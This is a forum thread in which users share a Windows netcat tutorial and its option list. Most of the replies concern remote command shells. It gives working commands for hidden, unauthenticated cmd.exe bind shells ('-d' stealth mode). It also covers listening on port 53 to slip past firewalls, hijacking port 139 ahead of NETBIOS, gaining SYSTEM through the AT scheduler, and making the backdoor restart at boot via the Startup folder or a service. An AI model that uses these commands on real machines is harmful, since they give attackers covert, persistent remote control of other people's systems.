I recently took a look at a tutorial for netcat that was posted. I did find it usefull but It did not explain the funtion of invidual commands or rather options. Is there a listing of netcat commands somewhere in the forums or a link to a place where I can find them. I have tried searching using the site search engine as well as google but have not found any results. Perhaps I am using poor keywords. If anyone has a source for this information I would greatly appreciate it.
Thanks,
v1v1d

Here u go... 10x for who posted it b4...

To use Netcat to retrieve the home page of a web site use the command:
nc -v www.website.com 80 < get.txt

You will see Netcat make a connection to port 80, send the text contained
in the file get.txt, and then output the web server's response to stdout.
The -v is for verbose. It tells you a little info about the connection
when it starts.

It is a bit easier to just open the connection and then type at the console
to do the same thing.
nc -v www.website.com 80

Then just type in GET / HTTP/1.0 and hit a couple of returns. You will
see the same thing as above.

A far more exciting thing to do is to get a quick shell going on a remote
machine by using the -l or "listen" option and the -e or "execute"
option. You run Netcat listening on particular port for a connection.
When a connection is made, Netcat executes the program of your choice
and connects the stdin and stdout of the program to the network connection.

nc -l -p 23 -t -e cmd.exe

will get Netcat listening on port 23 (telnet). When it gets connected to
by a client it will spawn a shell (cmd.exe). The -t option tells Netcat
to handle any telnet negotiation the client might expect.

This will allow you to telnet to the machine you have Netcat listening on
and get a cmd.exe shell when you connect. You could just as well use
Netcat instead of telnet:

nc xxx.xxx.xxx.xxx 23

will get the job done. There is no authentication on the listening side
so be a bit careful here. The shell is running with the permissions of the
process that started Netcat so be very careful. If you were to use the
AT program to schedule Netcat to run listening on a port with the
-e cmd.exe option, when you connected you would get a shell with user
NT AUTHORITY\SYSTEM.

The beauty of Netcat really shines when you realize that you can get it
listening on ANY port doing the same thing. Do a little exploring and
see if the firewall you may be behind lets port 53 through. Run Netcat
listening behind the firewall on port 53.

nc -L -p 53 -e cmd.exe

Then from outside the firewall connect to the listening machine:

nc -v xxx.xxx.xxx.xx 53

If you get a command prompt then you are executing commands on the
listening machine. Use 'exit' at the command prompt for a clean
disconnect. The -L (note the capital L) option will restart Netcat with
the same command line when the connection is terminated. This way you can
connect over and over to the same Netcat process.

A new feature for the NT version is the -d or detach from console flag.
This will let Netcat run without an ugly console window cluttering up the
screen or showing up in the task list.

You can even get Netcat to listen on the NETBIOS ports that are probably
running on most NT machines. This way you can get a connection to a
machine that may have port filtering enabled in the TCP/IP Security Network
control panel. Unlike Unix, NT does not seem to have any security around
which ports that user programs are allowed to bind to. This means any
user can run a program that will bind to the NETBIOS ports.

You will need to bind "in front of" some services that may already be
listening on those ports. An example is the NETBIOS Session Service that
is running on port 139 of NT machines that are sharing files. You need
to bind to a specific source address (one of the IP addresses of the
machine) to accomplish this. This gives Netcat priority over the NETBIOS
service which is at a lower priority because it is bound to ANY IP address.
This is done with the Netcat -s option:

nc -v -L -e cmd.exe -p 139 -s xxx.xxx.xxx.xxx

Now you can connect to the machine on port 139 and Netcat will field
the connection before NETBIOS does. You have effectively shut off
file sharing on this machine by the way. You have done this with just
user privileges to boot.

PROBLEMS with Netcat 1.1 for NT

There are a few known problems that will eventually be fixed. One is
the -w or timeout option. This works for final net reads but not
for connections. Another problem is using the -e option in UDP mode.
You may find that some of the features work on Windows 95. Most
of the listening features will not work on Windows 95 however. These will
be fixed in a later release.

Netcat is distributed with full source code so that people can build
upon this work. If you add something useful or discover something
interesting about NT TCP/IP let met know.

can you possibly make netcat spawn a telnet shell instead of cmd.exe i try this but it doesnt do anything.

THX for the good explain ATB

i've been looking for info about the commands for netcat for a while now.

so thanks a lot for your good explanation =)
i've experimented a little bit with it but i haven't been able to spawn a shell with it yet.

now i have some more to experiment with =)

cheerz
//KrYsSaR

Thanks man cool info !

Thanks for ATB..
Useful NC Guide..

Hello M8's

Hope This Helps, Should Be Preety Basic After That.

Good Luck

Best Regards

Adam

Vast Gsm

C:\>nc -h
[v1.10 NT]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d detach from console, stealth mode

-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]

C:\>

I'm using nc.exe -l -p xxxx -e cmd.exe & nc.exe -vv IP port and i haddn't got any problems. But I want to add in IIS 5.0 /4.0 defalut NC port isn't working. In IIS use 99 port.

nice thingie! didn't know 'bout that -e option

great info THX... really usefull...

Nice Tut,

Thanx

is netcat better than tel-net? what are pros vs cons

is possibile install netcat with service in a computer?

Example, is possibile install a service that exec the command nc -L -p 4242 -d -e cmd.exe every time that the machine is reboot ?

thx bye and sorry 4 my english

yes u can there is a tool in the downloads section, however u cant access this yet unless someone makes it public
but why not try other startup methods like in this thread
http://www.governmentsecurity.org/forum/in...?showtopic=5085

very thx nulladd !!!!
now i go to read the 3d
thx bye

I have read the 3d, but I do not understand like making to make to leave beyond to the exe to giving the necessary attributes to the nc.

For example I would want to make to leave to every reboot
nc.exe - L - p 3388 - d -e cmd.exe

but with those methods is impossible!

sorry 4 my english bye

simple solution
create a shortcut in ur startup folder with the path
c:\windows\system32\nc.exe -L -p port -d -e cmd.exe

this path may vary depending on ur config

yes, but if i work in a shell, as I create an shortcut in:

C:\Documents and Settings\USER\Start Menu\Programs\Startup


that in the path contain :

c:\windows\system32\nc.exe -L -p port -d -e cmd.exe

???

thx for the your availability

bye

http://savage.net.au/MSWindows/html/nc.html

this is the netcat bible i always refer too. explains every switch very well.

the manual you guys wrote seems similar to the manual i got when extracting netcat.

i was wondering if it was possible to use netcat to do a series of steps.

first; listen on a local TCP port and wait for a connection

second; when the connection is made, forward it to a different port.

not so hard so far, but I want this other port to be UDP, not TCP. Is there anyway to make this work.

Let me clarify more. Say set up netcat to listen on TCP port 81. Then have it tunnel all incoming connections to UDP port 445. This would be very helpful. Thanks ahead of time.

this is some addition to the cautios one out there. i believe that the port can be change instead of 8080. i had not try because this tools take a long time in my pc.

here it goes (can grab command shell ):

cmd line remote control tools

nc in stealth mode : -d = stealth, -e = prog to launch

1. nc -L -d -e cmd.exe -p 8080

2. nc xxx.xxx.xxx.xx 8080

Thanks for the good information, I never knew that netcat could listen on an open port, that works good for me =D.